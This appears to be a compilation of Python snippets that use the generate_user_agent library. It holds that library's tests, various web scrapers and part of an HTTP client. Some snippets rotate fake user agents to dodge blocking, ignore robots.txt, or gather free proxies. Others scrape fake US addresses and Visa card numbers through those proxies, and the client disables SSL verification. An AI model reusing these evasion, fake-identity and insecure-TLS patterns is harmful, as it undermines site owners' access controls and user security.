def test_navigator_option(self): for x in range(100): ua = generate_user_agent(navigator='firefox') self.assertTrue('firefox' in ua.lower()) ua = generate_user_agent(navigator='chrome') self.assertTrue('chrome' in ua.lower())
def test_platform_option_tuple(self): for x in range(100): ua = generate_user_agent(platform=('win', 'linux')) ua = generate_user_agent(platform=('win', 'linux', 'mac')) ua = generate_user_agent(platform=('win',)) ua = generate_user_agent(platform=('linux',)) ua = generate_user_agent(platform=('mac',))
def test_device_type_smartphone_chrome(): for _ in range(50): agent = generate_user_agent(device_type='smartphone', navigator='chrome') assert 'Mobile' in agent agent = generate_user_agent(device_type='tablet', navigator='chrome') assert 'Mobile' not in agent
def test_platform_option_tuple(): for _ in range(50): generate_user_agent(os=('win', 'linux')) generate_user_agent(os=('win', 'linux', 'mac')) generate_user_agent(os=('win',)) generate_user_agent(os=('linux',)) generate_user_agent(os=('mac',))
def test_platform_navigator_option(self): for x in range(100): ua = generate_user_agent(platform='win', navigator='firefox') self.assertTrue('firefox' in ua.lower()) self.assertTrue('windows' in ua.lower()) ua = generate_user_agent(platform='win', navigator='chrome') self.assertTrue('chrome' in ua.lower()) self.assertTrue('windows' in ua.lower())
def test_platform_option(): for _ in range(50): agent = generate_user_agent(os='linux') assert 'linux' in agent.lower() agent = generate_user_agent(os='win') assert 'windows' in agent.lower() agent = generate_user_agent(os='mac') assert 'mac' in agent.lower()
def test_navigator_option(): for _ in range(50): agent = generate_user_agent(navigator='firefox') assert 'firefox' in agent.lower() agent = generate_user_agent(navigator='chrome') assert 'chrome' in agent.lower() agent = generate_user_agent(navigator='ie') assert 'msie' in agent.lower() or 'rv:11' in agent.lower()
def test_platform_option(self): for x in range(100): ua = generate_user_agent(platform='linux') self.assertTrue('linux' in ua.lower()) ua = generate_user_agent(platform='win') self.assertTrue('windows' in ua.lower()) ua = generate_user_agent(platform='mac') self.assertTrue('mac' in ua.lower()) self.assertRaises(UserAgentRuntimeError, generate_user_agent, platform=11)
def getarticle(readfile): ''' get the article and save it in a different file ''' try: fileopen = open(readfile) except IOError: print "file " + readfile + " not in the location specified" return i = 1 for line in fileopen: try: ua = generate_user_agent() head = ua.encode('ascii', 'ignore') headers = {'useragent':head} print "reading article :" print line html = requests.get(line, headers = headers).text tex = fulltext(html) writefile = "201604"+str(j)+"_"+str(i)+".txt" with io.open(writefile, encoding='utf-8', mode='w+') as ns: strng = ' '.join(tex.split()) ns.write(strng) ns.close() i = i + 1 except: pass
def get_proxies(proxy_type, ip_set, start_page, end_page): """extract proxies from page source code, store them in redis Args: proxy_type (str): base url for proxy type, like the global variables CHINA and OTHER ip_set (str): which set should the ips be stored in redis start_page (int): which page to start crawling end_page (int): which page to stop crawling """ try: conn = get_connection() except Exception: print 'Error while connecting to redis' return proxies, curr_proxy =[], None for page in xrange(start_page, end_page+1): if page % 2 == 0: time.sleep(20) # get page source code headers = {'user-agent': generate_user_agent(), 'referer': 'http://www.xicidaili.com/'} text = requests.get(proxy_type+str(page), headers = headers).text # extract ips from source code soup = BeautifulSoup(text, 'lxml') for tr in soup.find_all('tr')[1:]: tds = tr.find_all('td') #if u'美国' in tds[3].text: proxy = tds[1].text+':'+tds[2].text if is_valid('https://www.amazon.com/', proxy): conn.sadd(ip_set, proxy) print '%s added to ip set %s' %(proxy, ip_set)
def getBaiduDictCate(): """ 功能:得到百度词库的分类,有三级分类,因为三级分类太细而且较少,所以将三级分类纳入其二级分类 :return:两个词典,第一个词典记录大类的ID和内容的对应关系,第二个词典记录了第一个词典中每一类大类下的所有分类 """ bigCateDict = {} smallCateDict ={} initPageURL = r'https://shurufa.baidu.com/dict' cateBaseURL = r'https://shurufa.baidu.com/dict_list?cid=' # 防止502错误 userAgent = generate_user_agent() referrer = 'http://shurufa.baidu.com/dict.html' headers = {} headers['User-Agent'] = userAgent headers['Referer'] = referrer # 抓取大类 try: request = urllib2.Request(url=initPageURL, headers=headers) response = urllib2.urlopen(request) data = response.read() except urllib2.HTTPError, e: print 'Error while getting the big category,error code:',e.code sys.exit()
def get_address(proxy): """fetch american address from https://fakena.me/random-real-address/ Args: proxy (str): proxy to visit the target site, ip:port Returns: format_addr (str): american address in the form of "address_line # city # state # zip" """ ignore_warnings() url = r'https://fakena.me/random-real-address/' referer = r'https://fakena.me' header = {'user-agent' : generate_user_agent() , 'referer':referer } curr_proxy ={ 'http': 'http://%s'%proxy } text = requests.get(url, headers = header, proxies = curr_proxy).text pattern = re.compile('<strong>(.+)<br>(.+)</strong>') result = re.findall(pattern, text) if result: # sometimes the result is empty print result[0][0], result[0][1] address_line = result[0][0] city, state_zip = result[0][1].split(',') state, zip = state_zip.split() format_addr = address_line+'#'+city+'#'+state+'#'+zip return format_addr else: return ''
def getheadline(companyName, day, firstlink, prevdatelink): ''' scrap headlines from finance.yahoo.com ''' #date = '2016-02-'+str(day) searchUrl = 'http://finance.yahoo.com/q/h?s='+companyName+'&t=2016-04-'+str(day) #use fake useragent #ua = generate_user_agent() head = generate_user_agent().encode('ascii', 'ignore') headers = {'useragent':head} response = requests.get(searchUrl, headers=headers) soup = BeautifulSoup(response.content, 'html.parser') links = soup.select('div.yfi_quote_headline ul > li > a') #write the search results in file, a new file for each day filename = 'links'+str(day)+'.txt' with io.open(filename, encoding='utf-8', mode='w+') as ns: count = 1 for link in links: nextlinks = link.get('href')+'\n' if count == 1: ns.write(nextlinks) firstlink = nextlinks elif prevdatelink == nextlinks: print "All uniques headlines scraped" break else: ns.write(nextlinks) count += 1 ns.close() return firstlink
def getCategoryPages(caterotyID,downloadDIR): """通过类别的初始页面得到该类别的总页数,并将所有的页数放到 PAGE_QUEUE 中供所有线程下载 :param caterotyID: 下载的词库类型的 ID,用于找到正确 url :param downloadDIR: 下载词库的存放目录 :return: """ global CATEID, DOWNLOAD_DIR, PAGE_BASE_URL, THREAD_LOCK CATEID = caterotyID DOWNLOAD_DIR = downloadDIR PAGE_BASE_URL = 'https://shurufa.baidu.com/dict_list?cid=%s' % CATEID pagePattern = re.compile(r'page=(\d+)#page') # 在网页源码找到其他页面的URL的正则表达匹配模式 # 防止502错误 userAgent = generate_user_agent() referrer = 'http://shurufa.baidu.com/dict.html' headers = {} headers['User-Agent'] = userAgent headers['Referer'] = referrer # 找到最大页的页码,然后所有页面就是1到最大页面 # 可能会返回502,500错误,最多尝试5次 maxTry = 8 data = None for i in xrange(maxTry): try: request = urllib2.Request(url=PAGE_BASE_URL, headers=headers) response = urllib2.urlopen(request) data = response.read() break except urllib2.HTTPError, e: if i == maxTry-1: with io.open(DOWNLOAD_LOG.decode('utf8'), mode = 'a', encoding = 'utf8') as f: f.write((str(e.code)+' error while parsing url '+PAGE_BASE_URL+'\n').decode('utf8')) except:
def on_blocked(self): ScholarConf.USER_AGENT = generate_user_agent() # Randomize user agent self.timeout *= 2.0 # Increase timeout (exponential backoff) if self.blocked_cmd is not None: status, output = getstatusoutput(self.blocked_cmd) if status != 0: self.status.error(output)
def send_query(self, query): # TODO: Randomize query, i.e. remove/change unused arguments to vary query signature self.queries_sent += 1 if self.queries_sent % self.queries_change == 0: self.queries_change = randint(3, 13) ScholarConf.USER_AGENT = generate_user_agent() return super(BibDLQuerier, self).send_query(query)
def invoke(self, url): headers = {'User-Agent': generate_user_agent()} req = requests.get(url, headers= headers) soup = BeautifulSoup(req.text, 'lxml') #from_encoding="gb2312") books = soup.select("div.book_list > ul > li") for book in books: self.parse_book(book)
def get_request(url): """ Takes in a url Outputs a list of html for each user's posts """ headers = {"User-Agent": generate_user_agent()} response = requests.get(url, headers) return response
def download_images(link_file_path, download_dir, log_dir): """download images whose links are in the link file Args: link_file_path (str): path of file containing links of images download_dir (str): directory to store the downloaded images Returns: None """ print('Start downloading with link file {0}..........'.format(link_file_path)) if not os.path.exists(log_dir): os.makedirs(log_dir) main_keyword = link_file_path.split('/')[-1] log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword) logging.basicConfig(level=logging.DEBUG, filename=log_file, filemode="a+", format="%(asctime)-15s %(levelname)-8s %(message)s") img_dir = download_dir + main_keyword + '/' count = 0 headers = {} if not os.path.exists(img_dir): os.makedirs(img_dir) # start to download images with open(link_file_path, 'r') as rf: for link in rf: try: o = urlparse(link) ref = o.scheme + '://' + o.hostname #ref = 'https://www.google.com' ua = generate_user_agent() headers['User-Agent'] = ua headers['referer'] = ref print('\n{0}\n{1}\n{2}'.format(link.strip(), ref, ua)) req = urllib.request.Request(link.strip(), headers = headers) response = urllib.request.urlopen(req) data = response.read() file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count)) count += 1 if count % 10 == 0: print('Process-{0} is sleeping'.format(main_keyword)) time.sleep(5) except urllib.error.URLError as e: print('URLError') logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason)) continue except urllib.error.HTTPError as e: print('HTTPError') logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except Exception as e: print('Unexpected Error') logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args)) continue
def download_with_time_limit(link_file_path, download_dir, log_dir, limit_time = 10): main_keyword = link_file_path.split('/')[-1] if not os.path.exists(log_dir): os.makedirs(log_dir) log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword) logging.basicConfig(level = logging.DEBUG, filename = log_file, filemode = "a+", format = "%(asctime)-15s %(levelname)-8s %(message)s") img_dir = download_dir + main_keyword + '/' count = 0 headers = {} if not os.path.exists(img_dir): os.makedirs(img_dir) signal.signal(signal.SIGALRM, handler) with open(link_file_path, 'r') as rf: for link in rf: try: ref = 'https://www.google.com' o = urlparse(link) ref = o.scheme + '://' + o.hostname ua = generate_user_agent() headers['User-Agent'] = ua headers['referer'] = ref # limit the time of downloading a image try: signal.alarm(limit_time) # set a timeout(alarm) req = urllib.request.Request(link.strip(), headers = headers) response = urllib.request.urlopen(req) data = response.read() except TimeLimitError as e: print('TimeLimitError: process-{0} encounters {1}'.format(main_keyword, e.value)) logging.error('TimeLimitError while downloading image{0}'.format(link)) continue finally: signal.alarm(0) # disable the alarm file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count)) count += 1 if count % 10 == 0: print('Process-{0} is sleeping'.format(main_keyword)) time.sleep(5) except urllib.error.HTTPError as e: print('HTTPError') logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except urllib.error.URLError as e: print('URLError') logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason)) continue except Exception as e: print('Unexpected Error') logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args)) continue
def download_images(main_keyword, supplemented_keywords, download_dir): """download images with one main keyword and multiple supplemented keywords Args: main_keyword (str): main keyword supplemented_keywords (list[str]): list of supplemented keywords Returns: None """ image_links = set() print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword)) # create a directory for a main keyword img_dir = download_dir + main_keyword + '/' if not os.path.exists(img_dir): os.makedirs(img_dir) for j in range(len(supplemented_keywords)): print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j])) search_query = (main_keyword + ' ' + supplemented_keywords[j]).replace(' ','%20') # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch' image_links = image_links.union(parse_page(url)) print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links))) time.sleep(2) print ("Process {0} get totally {1} links".format(os.getpid(), len(image_links))) print ("Start downloading...") count = 1 for link in image_links: try: req = urllib.request.Request(link, headers = {"User-Agent": generate_user_agent()}) response = urllib.request.urlopen(req) data = response.read() file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count)) count += 1 except urllib.error.URLError as e: logging.error('URLError while downloading image {0}\nreason:{1}'.format(link, e.reason)) continue except urllib.error.HTTPError as e: logging.error('HTTPError while downloading image {0}\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except Exception as e: logging.error('Unexpeted error while downloading image {0}\nerror type:{1}, args:{2}'.format(link, type(e), e.args)) continue print("Finish downloading, total {0} errors".format(len(image_links) - count))
def generate_profile(useragent="(default)"): profile = FirefoxProfile() if useragent.strip().lower()=="(default)": status("Using the default useragent") return profile elif useragent.strip().lower()=="(random)": random_useragent = generate_user_agent(os=('mac', 'linux')) profile.set_preference("general.useragent.override", random_useragent) # To make our useragent random status("Using random useragent "+random_useragent) return profile else: profile.set_preference("general.useragent.override", useragent) status("Using useragent "+useragent) return profile
def test_invalid_platform_option(): with pytest.raises(InvalidOption): generate_user_agent(os=11) with pytest.raises(InvalidOption): generate_user_agent(os='dos') with pytest.raises(InvalidOption): generate_user_agent(os='win,dos')
def get_phone_visa(): """fetch phone, visa from http://www.fakeaddressgenerator.com/World/us_address_generator""" url = r'http://www.fakeaddressgenerator.com/World/us_address_generator' referer = r'http://www.fakeaddressgenerator.com/World' header = {'user-agent' : generate_user_agent() , 'referer':referer } text = requests.get(url, headers = header).text soup = BeautifulSoup(text, 'lxml') info = soup.find_all('input') """ print 'name:',info[0]['value'] print 'phone:',info[9]['value'] print 'visa:',info[11]['value'] print 'expires:',info[13]['value'] """ name_phone = info[0]['value']+'#'+info[9]['value'] name_visa = info[0]['value']+'#'+info[11]['value']+'#'+info[13]['value'] print name_phone, name_visa return name_phone, name_visa
def __init__(self, proxy): """init the webdriver by setting the proxy and user-agent Args: proxy (str): proxy in the form of ip:port """ # set proxy ip, port = proxy.split(':') profile = webdriver.FirefoxProfile() profile.set_preference("network.proxy.type", 1) profile.set_preference("network.proxy.http", ip) profile.set_preference("network.proxy.http_port", port) # set user_agent profile.set_preference("general.useragent.override", generate_user_agent()) profile.update_preferences() self.driver = webdriver.Firefox(firefox_profile=profile) print 'current proxy: %s'%proxy
def download_page(url): """download raw content of the page Args: url (str): url of the page Returns: raw content of the page """ try: headers = {} headers['User-Agent'] = generate_user_agent() headers['Referer'] = 'https://www.google.com' req = urllib.request.Request(url, headers = headers) resp = urllib.request.urlopen(req) return str(resp.read()) except Exception as e: print('error while downloading page {0}'.format(url)) logging.error('error while downloading page {0}'.format(url)) return None
def is_valid(target_url, ip, referer): """judge if a proxy ip is valid for target_url Args: target_url (str): url that need to visite with a proxy ip (str): the set in redis to get referer (str, optional): referer part of headers of the request Returns: boolean """ ignore_warnings() proxy = { 'http': 'http://%s' %ip } headers = {'user-agent': generate_user_agent(), 'referer': referer} try: r = requests.get(target_url, headers = headers, proxies = proxy, timeout = 6) return True except Exception: return False
def downloadSingleCate(cateID, dirName, downloadLog, tryBest = True): """下载某一类别的词库 :param cateID: 类别ID :param dirName: 下载的目录 :parm downloadLog: 下载日志,记录下载不成功的文件 :parm downloadLog: 是否达到最大尝试次数 :return: None """ pageBaseUrl = r'https://shurufa.baidu.com/dict_list?cid=%s' %cateID fileBaseUrl = r'https://shurufa.baidu.com/dict_innerid_download?innerid=' pagePattern = re.compile(r'page=(\d+)#page') # 非贪婪匹配,查找跳转到其他页面的url filePattern = re.compile(r'dict-name="(.*?)" dict-innerid="(\d+)"') # 非贪婪匹配,查找可下载的文件的id和 visited = set() # 记录某个url是否已经被访问了 downloaded = set() # 记录某个文件是否被下载了 # 防止502错误 userAgent = generate_user_agent() referrer = 'http://shurufa.baidu.com/dict.html' headers = {} headers['User-Agent'] = userAgent headers['Referer'] = referrer # 找到最大页的页码,然后所有页面就是1到最大页面 try: request = urllib2.Request(url=pageBaseUrl, headers=headers) response = urllib2.urlopen(request) data = response.read() except urllib2.HTTPError, e: if tryBest: with io.open(downloadLog.decode('utf8'), mode = 'a', encoding = 'utf8') as f: f.write((str(e.code)+' error while parsing url '+pageBaseUrl+'\n').decode('utf8')) return False
def main(): page = 0 while True: page += 1 payload = { 'ss': 1, 'page': page, } user_agent = generate_user_agent() headers = { 'User-Agent': user_agent, } print(f'PAGE: {page}') response = requests.get(HOST + ROOT_PATH, params=payload, headers=headers) response.raise_for_status() random_sleep() html = response.text soup = BeautifulSoup(html, 'html.parser') class_ = 'card card-hover card-visited wordwrap job-link' cards = soup.find_all('div', class_=class_) if not cards: cards = soup.find_all('div', class_=class_ + ' js-hot-block') result = [] if not cards: break for card in cards: tag_a = card.find('h2').find('a') title = tag_a.text href = tag_a['href'] result.append([title, href]) vac_response = requests.get(HOST + href, headers=headers) vac_html = vac_response.text vac_soup = BeautifulSoup(vac_html, 'html.parser') workua_id = int(href.split('/')[-2]) vacancy = vac_soup.find('h1', id='h1-name').text address = vac_soup.find( 'p', class_='text-indent add-top-sm').text.strip() address = address.split('\n')[0] blocks = vac_soup.find_all( 'p', class_='text-indent text-muted add-top-sm') for block in blocks: if block.find('a') != None: company = block.find('a').find('b').text else: if block.find('b') != None: salary = block.find('b').text salary = salary.replace('\u202f', '') salary = salary.replace('\u2009', '') if not 'salary' in locals(): salary = None data = (workua_id, vacancy, company, address, salary) cur.execute('''INSERT INTO jobs VALUES (?, ?, ?, ?, ?)''', data) db.commit() save_info(result) db.close()
# # For simplicity, this file contains only settings considered important or # commonly used. You can find more settings consulting the documentation: # # https://doc.scrapy.org/en/latest/topics/settings.html # https://doc.scrapy.org/en/latest/topics/downloader-middleware.html # https://doc.scrapy.org/en/latest/topics/spider-middleware.html from user_agent import generate_user_agent BOT_NAME = 'HeZhiNews' SPIDER_MODULES = ['HeZhiNews.spiders'] NEWSPIDER_MODULE = 'HeZhiNews.spiders' # Crawl responsibly by identifying yourself (and your website) on the user-agent USER_AGENT = generate_user_agent(os='win') # Obey robots.txt rules ROBOTSTXT_OBEY = False # Configure maximum concurrent requests performed by Scrapy (default: 16) CONCURRENT_REQUESTS = 8 # Configure a delay for requests for the same website (default: 0) # See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay # See also autothrottle settings and docs DOWNLOAD_DELAY = 3 # The download delay setting will honor only one of: CONCURRENT_REQUESTS_PER_DOMAIN = 8 CONCURRENT_REQUESTS_PER_IP = 8
def test_it(self): ua = generate_user_agent() self.assertTrue(len(ua) > 0)
def test_platform_linux(self): for x in range(100): ua = generate_user_agent(platform='linux') self.assertTrue(ua.startswith('Mozilla/5.0 (X11;'))
import re from bs4 import BeautifulSoup from user_agent import generate_user_agent # Web scraping details lastFmUrl = "https://www.last.fm" topArtistsUrl = "/user/kaktusas86/library/artists?date_preset=ALL_TIME&page=1" headers = { 'User-Agent': generate_user_agent(device_type="desktop", os=('mac', 'linux')) } def fetchUrl(url, headers): response = requests.get(url, timeout=60, headers=headers) return BeautifulSoup(response.content, 'html.parser') def fetchTopArtistsWithSoup(): topArtistsSoup = fetchUrl(url=(lastFmUrl + topArtistsUrl), headers=headers) topArtistsHtml = topArtistsSoup.find(id="top-artists-section") # Loop through table rows reading basiuc info about artist for artistInfo in topArtistsHtml.find_all('tr'): try: #Parse basic info: rank, title and scrobble count rank = artistInfo.find('td', class_="chartlist-index") rank = " ".join(rank.string.split()) name = artistInfo.find('td', class_="chartlist-name") href = name.find('a', class_="link-block-target").get('href') name = " ".join(name.text.split()) scrobbles = artistInfo.find('td', class_="chartlist-countbar")
def __init__(self, base_url): super().__init__(base_url) self.headers = { "User-Agent": generate_user_agent(device_type="desktop", os=("mac", "linux")) }
@file: jianshu.py @time: 01/03/2018 20:44 """ import requests from bs4 import BeautifulSoup from core import config, logger, db from entities import Article import user_agent headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Accept': 'text/html, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': user_agent.generate_user_agent(), 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8,ja;q=0.6' } class Config(object): def __init__(self, cfg: dict): self.seminars = cfg['seminars'] self.limit = cfg['limit'] self.debug = cfg['debug'] if 'debug' in cfg else True class Jianshu: _seminar_url = 'https://www.jianshu.com/c/%s?order_by=added_at&page=%d' _jianshu = 'https://www.jianshu.com'
def page_scraper(links): print('Cruises Pages scrap process...') result = [] for url in links: try: user_agent_ = { 'User-Agent': generate_user_agent(device_type='desktop', os=('mac', 'linux')) } print('scrap url page ...' + url[-30:-1] + 'l') dict_result = {} ask = requests.get(url, headers=user_agent_) soup = BSoup(ask.content, 'html.parser') #Получение имени name = soup.find('div', class_='col-md-9 river-site-highlight').find( 'h1').get_text().split('\n')[0] dict_result.update({'name': name}) #Получение количества дней soup_iter = soup.find( 'div', class_='panel-group accordion route').find_all( 'div', class_='panel panel-default') count_days = len(soup_iter) #Получение маршрутов itineary = [ soup_item.find('span', class_="route-city").text.replace( ' ', '').replace('\n', '') for soup_item in soup_iter ] dict_result.update({'itineary': itineary}) #Получение списка с датой отправки, кораблем, ценой soup_dayprice_iter = soup.find( 'div', class_='panel-group accordion price accordeon-data-price' ).find_all('div', class_='panel panel-default accordeon-panel-default') temp_list = [] for soup_item in soup_dayprice_iter: tag_a = soup_item.find('a', class_='collapsed panel-title') date_ = tag_a.find('div', class_='price-date').find( 'span', class_='price-duration').get_text() ship_ = tag_a.find( 'div', class_='price-ship').find('span').get_text() price_ = tag_a.find('div', class_='price-ship').find( 'div', class_='pull-right').find( 'span', class_='big-table-font').text.replace(' ', '').replace( '\n', '').replace('€', '').replace('.', '') temp_list.append( {date_converter(date_): { 'ship': ship_, 'price': price_ }}) dict_result.update({'days': temp_list}) result.append(dict_result) except: print('Page ' + url[-30:-1] + 'l' + 'Not load') write_in_file(result)
def main(platform, navigator, **kwargs): for x in range(30): print(generate_user_agent(platform=platform, navigator=navigator))
def __init__(self): headers = {} headers['User-Agent'] = generate_user_agent() self.session = Session() self.session.headers = headers
class StatsZbHgjdSpider(scrapy.Spider): name = 'StatsZbHgjdSpider' allowed_domains = ['data.stats.gov.cn'] start_urls = ['http://data.stats.gov.cn/easyquery.htm?cn=C01'] DOWNLOAD_DELAY =20 get_tree_url = 'http://data.stats.gov.cn/easyquery.htm' root_zb = ['A01', 'A02', 'A03', 'A04', 'A05', 'A06'] # root_zb = ['A01'] root_param ={"dbcode":"hgjd","wdcode":"zb","m":"getTree"} user_agent = generate_user_agent() headers = { 'Accept': 'text/plain, */*; q=0.01', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'keep-alive', # 'Content-Length': '38', 'Content-Type': 'application/x-www-form-urlencoded', # 'Cookie': 'JSESSIONID=F57026E9795D5E42B04115AB1FC3F258; u=1; wzws_cid=7043b0f11490d1af13890c46dab3c77ff11815b0d6ed6e0bb208fba85822ed47ea9b8783a325b98ef76e90cfe4933255c2f6c6ab8c95edff8fd3105126e023a7', 'Host': 'data.stats.gov.cn', 'Origin': 'http://data.stats.gov.cn', 'Referer': 'http://data.stats.gov.cn/easyquery.htm', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36', 'X-Requested-With': 'XMLHttpRequest'} headers["User-Agent"]=user_agent def parse(self, response): for id in self.root_zb: self.root_param["id"] = id yield scrapy.FormRequest(url=(self.get_tree_url+"?"+urllib.parse.urlencode(self.root_param)),method='POST',headers=self.headers,callback=self.parse_content,dont_filter=True) # yield scrapy.FormRequest(url=self.get_tree_url, method='POST', # headers=self.headers,callback=self.parse_content,dont_filter=True) def parse_content(self, response): try: time.sleep(1) if 200 != response.status: print("res status not 200!") # print(str(response.body,"utf-8")) son_zb_arr = json.loads(str(response.body,"utf-8")) for key in son_zb_arr: # item = StatsZbSpiderItem() # item['dbcode'] = key['dbcode'] # item['id'] = key['id'] # item['isParent'] = key['isParent'] # item['name'] = key['name'] # item['pid'] = key['pid'] # item['wdcode'] = key['wdcode'] # print(key) if key['isParent']: self.root_param["id"] = key["id"] yield scrapy.FormRequest(url=(self.get_tree_url + "?" + urllib.parse.urlencode(self.root_param)), method='POST', headers=self.headers, callback=self.parse_content, dont_filter=True) yield key except BaseException: print('')
def process_config(self, grab): """ Setup curl instance with values from ``self.config``. """ # Copy some config for future usage self.config_nobody = grab.config["nobody"] self.config_body_maxsize = grab.config["body_maxsize"] try: request_url = normalize_url(grab.config["url"]) except Exception as ex: raise error.GrabInvalidUrl(u"%s: %s" % (six.text_type(ex), grab.config["url"])) # py3 hack if not six.PY3: request_url = make_str(request_url) self.curl.setopt(pycurl.URL, request_url) # Actually, FOLLOWLOCATION should always be 0 # because redirect logic takes place in Grab.request method # BUT in Grab.Spider this method is not invoked # So, in Grab.Spider we still rely on Grab internal ability # to follow 30X Locations self.curl.setopt(pycurl.FOLLOWLOCATION, 1 if grab.config["follow_location"] else 0) self.curl.setopt(pycurl.MAXREDIRS, grab.config["redirect_limit"]) self.curl.setopt(pycurl.CONNECTTIMEOUT, grab.config["connect_timeout"]) self.curl.setopt(pycurl.TIMEOUT, grab.config["timeout"]) self.curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4) # self.curl.setopt(pycurl.DNS_CACHE_TIMEOUT, 0) if not grab.config["connection_reuse"]: self.curl.setopt(pycurl.FRESH_CONNECT, 1) self.curl.setopt(pycurl.FORBID_REUSE, 1) self.curl.setopt(pycurl.NOSIGNAL, 1) self.curl.setopt(pycurl.HEADERFUNCTION, self.header_processor) if grab.config["body_inmemory"]: self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor) else: if not grab.config["body_storage_dir"]: raise error.GrabMisuseError("Option body_storage_dir is not defined") self.setup_body_file( grab.config["body_storage_dir"], grab.config["body_storage_filename"], create_dir=grab.config["body_storage_create_dir"], ) self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor) if grab.config["verbose_logging"]: self.verbose_logging = True # User-Agent if grab.config["user_agent"] is None: if grab.config["user_agent_file"] is not None: with open(grab.config["user_agent_file"]) as inf: lines = inf.read().splitlines() grab.config["user_agent"] = random.choice(lines) else: grab.config["user_agent"] = generate_user_agent() # If value is None then set empty string # None is not acceptable because in such case # pycurl will set its default user agent "PycURL/x.xx.x" if not grab.config["user_agent"]: grab.config["user_agent"] = "" self.curl.setopt(pycurl.USERAGENT, grab.config["user_agent"]) if grab.config["debug"]: self.curl.setopt(pycurl.VERBOSE, 1) self.curl.setopt(pycurl.DEBUGFUNCTION, self.debug_processor) # Ignore SSL errors self.curl.setopt(pycurl.SSL_VERIFYPEER, 0) self.curl.setopt(pycurl.SSL_VERIFYHOST, 0) # Disabled to avoid SSL3_READ_BYTES:sslv3 alert handshake failure error # self.curl.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) if grab.request_method in ("POST", "PUT"): if grab.config["post"] is None and grab.config["multipart_post"] is None: raise GrabMisuseError( "Neither `post` or `multipart_post`" " options was specified for the %s" " request" % grab.request_method ) if grab.request_method == "POST": self.curl.setopt(pycurl.POST, 1) if grab.config["multipart_post"]: if isinstance(grab.config["multipart_post"], six.string_types): raise error.GrabMisuseError("multipart_post option could not be a string") post_items = normalize_http_values( grab.config["multipart_post"], charset=grab.config["charset"], ignore_classes=(UploadFile, UploadContent), ) # py3 hack if six.PY3: post_items = decode_pairs(post_items, grab.config["charset"]) # import pdb; pdb.set_trace() self.curl.setopt(pycurl.HTTPPOST, process_upload_items(post_items)) elif grab.config["post"]: post_data = normalize_post_data(grab.config["post"], grab.config["charset"]) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) self.curl.setopt(pycurl.POSTFIELDS, post_data) else: self.curl.setopt(pycurl.POSTFIELDS, "") elif grab.request_method == "PUT": data = grab.config["post"] if isinstance(data, six.text_type): # py3 hack # if six.PY3: # data = data.encode('utf-8') # else: raise error.GrabMisuseError("Value of post option could be only " "byte string if PUT method is used") self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.CUSTOMREQUEST, "PUT") self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) elif grab.request_method == "PATCH": data = grab.config["post"] if isinstance(data, six.text_type): raise error.GrabMisuseError("Value of post option could be only byte " "string if PATCH method is used") self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.CUSTOMREQUEST, "PATCH") self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) elif grab.request_method == "DELETE": self.curl.setopt(pycurl.CUSTOMREQUEST, "DELETE") elif grab.request_method == "HEAD": self.curl.setopt(pycurl.NOBODY, 1) elif grab.request_method == "UPLOAD": self.curl.setopt(pycurl.UPLOAD, 1) elif grab.request_method == "GET": self.curl.setopt(pycurl.HTTPGET, 1) elif grab.request_method == "OPTIONS": data = grab.config["post"] if data is not None: if isinstance(data, six.text_type): raise error.GrabMisuseError( "Value of post option could be only byte " "string if PATCH method is used" ) self.curl.setopt(pycurl.UPLOAD, 1) self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read) self.curl.setopt(pycurl.INFILESIZE, len(data)) self.curl.setopt(pycurl.CUSTOMREQUEST, "OPTIONS") else: raise error.GrabMisuseError("Invalid method: %s" % grab.request_method) headers = grab.config["common_headers"] if grab.config["headers"]: headers.update(grab.config["headers"]) # This is required to avoid some problems headers.update({"Expect": ""}) header_tuples = [str("%s: %s" % x) for x in headers.items()] self.curl.setopt(pycurl.HTTPHEADER, header_tuples) self.process_cookie_options(grab, request_url) if grab.config["referer"]: 